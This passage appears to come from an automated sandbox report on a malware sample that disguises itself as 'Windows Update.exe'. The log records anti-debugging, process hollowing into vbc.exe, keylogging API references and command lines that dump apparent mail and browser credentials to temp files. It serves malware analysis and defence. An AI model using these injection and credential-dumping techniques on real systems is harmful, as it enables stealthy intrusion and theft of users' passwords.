          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_02557920 LdrInitializeThunk,10_2_02557920
          Source: C:\Users\user\Desktop\5.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1E2A02 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6F1E2A02
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_00401E1D SetUnhandledExceptionFilter,2_2_00401E1D
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040446F
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00401C88
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00401F30
          Source: C:\Users\user\Desktop\5.exeCode function: 2_1_00401E1D SetUnhandledExceptionFilter,2_1_00401E1D
          Source: C:\Users\user\Desktop\5.exeCode function: 2_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_1_0040446F
          Source: C:\Users\user\Desktop\5.exeCode function: 2_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_1_00401C88
          Source: C:\Users\user\Desktop\5.exeCode function: 2_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_1_00401F30
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F712A02 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6F712A02
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_00401E1D SetUnhandledExceptionFilter,10_2_00401E1D
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0040446F
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00401C88
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00401F30
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_1_00401E1D SetUnhandledExceptionFilter,10_1_00401E1D
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_1_0040446F
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_1_00401C88
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_1_00401F30

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\5.exeMemory written: C:\Users\user\Desktop\5.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Users\user\AppData\Roaming\Windows Update.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000Jump to behavior
          .NET source code references suspicious native API functionsShow sources
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
          Source: 2.2.5.exe.4b20000.15.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
          Source: C:\Users\user\Desktop\5.exeProcess created: C:\Users\user\Desktop\5.exe "C:\Users\user\Desktop\5.exe" Jump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe" Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe" Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2128Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128Jump to behavior
          Source: Windows Update.exe, 0000000A.00000002.386992337.0000000002CDC000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353510834.0000000002CDE000.00000004.00000001.sdmpBinary or memory string: (redProgram Manager
          Source: Windows Update.exe, 0000000A.00000002.386992337.0000000002CDC000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353510834.0000000002CDE000.00000004.00000001.sdmpBinary or memory string: [Program Manager - 12/7/2021 6:30:45 PM]
          Source: Windows Update.exe, 0000000A.00000002.386992337.0000000002CDC000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353510834.0000000002CDE000.00000004.00000001.sdmpBinary or memory string: Program Manager
          Source: Windows Update.exe, 0000000A.00000002.386992337.0000000002CDC000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353510834.0000000002CDE000.00000004.00000001.sdmpBinary or memory string: [Program Manager - X1(r
          Source: Windows Update.exe, 0000000A.00000000.344460542.0000000000F90000.00000002.00020000.sdmp, Windows Update.exe, 0000000A.00000000.352318705.0000000000F90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: Windows Update.exe, 0000000A.00000000.344460542.0000000000F90000.00000002.00020000.sdmp, Windows Update.exe, 0000000A.00000000.352318705.0000000000F90000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: Windows Update.exe, 0000000A.00000000.344460542.0000000000F90000.00000002.00020000.sdmp, Windows Update.exe, 0000000A.00000000.352318705.0000000000F90000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: Windows Update.exe, 0000000A.00000002.386992337.0000000002CDC000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353510834.0000000002CDE000.00000004.00000001.sdmpBinary or memory string: [Program Manager - 12/7/2021 6:30:45 PM
          Source: Windows Update.exe, 0000000A.00000000.344460542.0000000000F90000.00000002.00020000.sdmp, Windows Update.exe, 0000000A.00000000.352318705.0000000000F90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: Windows Update.exe, 0000000A.00000000.344460542.0000000000F90000.00000002.00020000.sdmp, Windows Update.exe, 0000000A.00000000.352318705.0000000000F90000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: Windows Update.exe, 0000000A.00000002.386992337.0000000002CDC000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353510834.0000000002CDE000.00000004.00000001.sdmpBinary or memory string: [Program Manager
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
